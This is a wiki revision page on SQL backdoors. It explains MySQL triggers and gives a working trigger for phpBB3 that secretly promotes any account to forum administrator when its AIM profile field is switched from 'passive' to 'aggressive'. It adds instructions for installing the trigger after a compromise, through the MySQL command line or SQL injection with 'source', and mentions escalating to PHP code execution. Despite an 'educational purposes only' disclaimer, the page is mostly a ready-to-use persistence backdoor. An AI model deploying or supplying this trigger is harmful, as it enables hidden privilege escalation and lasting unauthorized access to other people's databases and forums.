Difference between revisions of "SQL backdoor"
(→MySQL) |
(→Event Procedures) |
||
Line 6: | Line 6: | ||
'''Sub-procedures''' are similar to '''functions''' or '''methods''' in other programming languages. They can be passed arguments, perform operations on the arguments passed, and return computed data. | '''Sub-procedures''' are similar to '''functions''' or '''methods''' in other programming languages. They can be passed arguments, perform operations on the arguments passed, and return computed data. | ||
==Event Procedures== | ==Event Procedures== | ||
− | '''Triggers''', otherwise referred to as '''event procedures''' in other programming languages, may be attached to any table for '''update''','''delete''', or '''insert''' queries. It is important to note that while triggers cannot be bound to '''select''' queries, many applications store user activity history in [[SQL]] (search history, for example). In stead of hooking the '''SELECT ... LIKE''' statement against the table being searched to determine if a search query contained a particular keyword, a developer can hook the '''INSERT''' query against the history table where the search is logged. | + | {{warning|If a table already has a trigger attached for the query type you are attempting to hook, installation of the backdoor will fail.}}'''Triggers''', otherwise referred to as '''event procedures''' in other programming languages, may be attached to any table for '''update''','''delete''', or '''insert''' queries. It is important to note that while triggers cannot be bound to '''select''' queries, many applications store user activity history in [[SQL]] (search history, for example). In stead of hooking the '''SELECT ... LIKE''' statement against the table being searched to determine if a search query contained a particular keyword, a developer can hook the '''INSERT''' query against the history table where the search is logged. |
=Implementation= | =Implementation= |
Revision as of 21:56, 25 January 2012
SQL Malware affects a variety of database-driven applications, including but not limited to web applications, services, and desktop applications. This breed of malware is made possible by the SQL functionality for triggers and stored sub-procedures. |
Contents
Concept
Subprocedures
Sub-procedures are similar to functions or methods in other programming languages. They can be passed arguments, perform operations on the arguments passed, and return computed data.
Event Procedures
If a table already has a trigger attached for the query type you are attempting to hook, installation of the backdoor will fail. |
Implementation
These notes are for educational purposes only. Use of these code snippets on systems or databases that you do not own is a criminal act. |
MySQL
- CREATE FUNCTION and CREATE PROCEDURE require the CREATE ROUTINE privilege to execute successfully. Depending on the security context of the CREATE statement's DEFINER clause, the SUPER privilege may also be required. (As of MySQL 5.0.3)
- CREATE TRIGGER requires the SUPER privilege on the selected database in order to execute successfully.
- CREATE TRIGGER was added to MySQL in version 5.0.2 and has not been removed since.
Syntax
Because MySQL procedures and triggers are meant to be stored by the SQL server rather than interpreted at runtime, a delimiter command must be used from the command line in order for the `;' character to pass through to the server unscathed. Create Trigger Syntax:
delimiter # create trigger trigger_name before [ update | insert | delete ] on table_name for each row begin [procedural sql code goes here] end; # delimiter ;
Example: phpBB3 backdoor
Obtaining forum administrator level permissions on phpbb3 can allow an attacker to obtain remote code execution by enabling PHP in template files and embedding a PHP backdoor. |
Code
delimiter # CREATE TRIGGER update_users BEFORE UPDATE ON phpbb3_users FOR EACH ROW BEGIN IF OLD.user_aim="passive" AND NEW.user_aim="aggressive" THEN SET NEW.group_id = 5; SET NEW.user_type = 3; END IF; END;# delimiter ; |
Analysis
In phpBB3, default settings for user_type and group_id for an administrative user are 3 and 5, respectively. In order to ensure we don't trip our backdoor by accident, we require two actions to activate it. A user must first set their AIM (or AOL instant messenger) name in their forum profile to `passive'. This will meet the first criteria. Changing the AIM name directly from `passive' to `aggressive' will activate the backdoor and upgrade the user account to a forum administrator.
Backdoor Installation
Due to the fact that they lie virtually dormant until conditions are met and typically ensure escalation to code execution, backdoors of this type are typically installed after a machine is compromised in case of the event that access is lost. |
Access/Configuration Requirements
One of the following is necessary to install your backdoor:
- MySQL CLI Access
- Ability to write files on the target system
- Multiple queries allowed in the SQL statements from the SQL api in use
Writing to file and using "source"
- Write the code contents to a .sql file (we will use file.sql as an example)
- From an SQL injection vulnerability or from the mysql command line, execute the query:
source /path/to/file.sql
Writing directly into the command line
- Invoke `mysql -uuser -ppassword [database_name]' from the Bash command line.
- If you forgot to specify the database name, simply typing `use [databasename]' will resolve this.
- Paste the code exactly as it is on this page into the MySQL terminal.